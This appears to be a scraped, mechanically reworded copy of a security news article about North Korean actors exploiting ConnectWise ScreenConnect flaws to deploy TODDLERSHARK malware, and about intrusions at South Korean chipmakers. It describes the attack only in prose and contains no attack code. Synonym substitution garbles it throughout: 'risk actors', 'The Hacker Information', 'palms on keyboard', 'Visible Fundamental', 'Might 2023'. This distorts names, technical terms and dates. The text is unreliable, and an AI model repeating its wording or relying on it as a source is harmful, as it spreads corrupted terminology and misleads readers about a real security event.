Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware

Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware

North Korean risk actors have exploited the just lately disclosed safety flaws in ConnectWise ScreenConnect to deploy a brand new malware known as TODDLERSHARK.

In accordance with a report shared by Kroll with The Hacker Information, TODDLERSHARK overlaps with identified Kimsuky malware comparable to BabyShark and ReconShark.

“The risk actor gained entry to the sufferer workstation by exploiting the uncovered setup wizard of the ScreenConnect software,” safety researchers Keith Wojcieszek, George Glass, and Dave Truman mentioned.

“They then leveraged their now ‘palms on keyboard’ entry to make use of cmd.exe to execute mshta.exe with a URL to the Visible Fundamental (VB) based mostly malware.”


The ConnectWise flaws in query are CVE-2024-1708 and CVE-2024-1709, which got here to mild final month and have since come underneath heavy exploitation by a number of risk actors to ship cryptocurrency miners, ransomware, distant entry trojans, and stealer malware.

Kimsuky, also called APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (beforehand Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to incorporate new instruments, the newest being GoBear and Troll Stealer.

BabyShark, first discovered in late 2018, is launched utilizing an HTML Utility (HTA) file. As soon as launched, the VB script malware exfiltrates system data to a command-and-control (C2) server, maintains persistence on the system, and awaits additional instruction from the operator.

Then in Might 2023, a variant of BabyShark dubbed ReconShark was noticed being delivered to particularly focused people via spear-phishing emails. TODDLERSHARK is assessed to be the most recent evolution of the identical malware attributable to code and behavioral similarities.

The malware, apart from utilizing a scheduled activity for persistence, is engineered to seize and exfiltrate delicate details about the compromised hosts, thereby appearing as a helpful reconnaissance instrument.

TODDLERSHARK “reveals components of polymorphic conduct within the type of altering identification strings in code, altering the place of code through generated junk code, and utilizing uniquely generate C2 URLs, which may make this malware onerous to detect in some environments,” the researchers mentioned.


The event comes as South Korea’s Nationwide Intelligence Service (NIS) accused its northern counterpart of allegedly compromising the servers of two home (and unnamed) semiconductor producers and pilfering helpful information.

The digital intrusions happened in December 2023 and February 2024. The risk actors are mentioned to have focused internet-exposed and weak servers to achieve preliminary entry, subsequently leveraging living-off-the-land (LotL) strategies slightly than dropping malware as a way to higher evade detection.

“North Korea might have begun preparations for its personal manufacturing of semiconductors attributable to difficulties in procuring semiconductors attributable to sanctions in opposition to North Korea and elevated demand as a result of growth of weapons comparable to satellite tv for pc missiles,” NIS said.

Notify of
Inline Feedbacks
View all comments
Previous Post
Navigating Biometric Data Security Risks in the Digital Age

Navigating Biometric Information Safety Dangers within the Digital Age

Next Post
Fast-Growing RA Ransomware Group Goes Global

Quick-Rising RA Ransomware Group Goes International

Related Posts